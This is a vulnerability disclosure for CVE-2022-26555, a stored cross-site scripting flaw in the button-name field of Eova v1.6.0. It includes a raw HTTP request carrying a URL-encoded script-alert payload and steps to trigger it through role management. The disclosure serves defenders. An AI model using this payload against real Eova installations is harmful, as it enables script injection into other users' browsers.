Headline
CVE-2022-26555: There is a stored xss vulnerability exists in eova · Issue #I4VRE9 · EOVA/eova - Gitee.com
A stored cross-site scripting (XSS) vulnerability in the Add a Button function of Eova v1.6.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the button name text box.
[Suggested description]
Cross SIte Scripting (XSS) vulnerability exists in eova. Because the form submission did not effectively process the special characters entered by the user, the malicious JS code was executed.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/eova/eova
[Affected Product Code Base]
v1.6.0
[Affected Component]
POST /button/doQuick HTTP/1.1
Host: localhost:8700
Content-Length: 147
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8700
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8700/button/quick/biz_demo_tree_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=D8FBC740992D82D7A03C51EC3BBFEF12
Connection: close
menu_code=biz_demo_tree_code&icon=eova-icon0&name=12%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E&ui=%2FTologin&uri=&bs=%2FtoLogin&group_num=0&role=1
[Attack Type]
Remote
[Impact Code execution]
true
[Vulnerability proof]
Quickly add a button, and enter the malicious JS code in the button name information box.
Enter the system management - role management page, select a role for authorization, open the icon display list, and trigger the XSS pop-up window.
